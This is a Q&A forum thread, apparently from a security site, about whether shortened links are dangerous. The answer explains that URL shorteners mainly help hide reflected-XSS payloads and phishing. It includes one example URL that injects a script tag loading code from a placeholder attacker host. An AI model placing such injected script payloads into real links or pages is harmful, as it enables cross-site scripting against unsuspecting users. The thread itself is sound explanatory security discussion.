I've been into IT-sec for a few years now and I have recently gotten in to the whole reddit/r/netsec, twitter, security.stackexchange thing, to get more involved with the community. What surprises me alot is that people are posting shortened links everywhere.
How can It-sec people trust other it-sec people? Are people content with just using the lastest updates with NoScript and hope there is no one linking to a page with an advanced exploit kit or persistent xss vuln.
hope there is no one linking to a page with an advanced exploit kit or persistent xss vuln.
The risk with shortened links isn't really persistent XSS, but reflected XSS and phishing.
Let's assume stackexchange is open to persistent XSS. If I post a link to https://security.stackexchange.com/questions/414141/my-evil-question you would believe that it is secure, visit it, and my JavaScript code would be run. Using URL shorteners doesn't add anything to my attack (it might even make you more suspicious).
If on the other hand stackexchange is open to reflected XSS, the URL would look like https://security.stackexchange.com/questions/414141/my-evil-question?someParam=<script src=evil.attacker/script.js></script>, and in that case shortening the URL would be helpful to hide the injected script.
How can It-sec people trust other it-sec people?
Well, you shouldn't trust random people at reddit/r/netsec, twitter, security.stackexchange.
And yes, latest updates are a good idea (most browsers have at least some filtering to defend against reflected XSS, and some phishing filters), and NoScript is also good.
If you want to know what is behind a shortened link, check out this question about verifying shortened links.
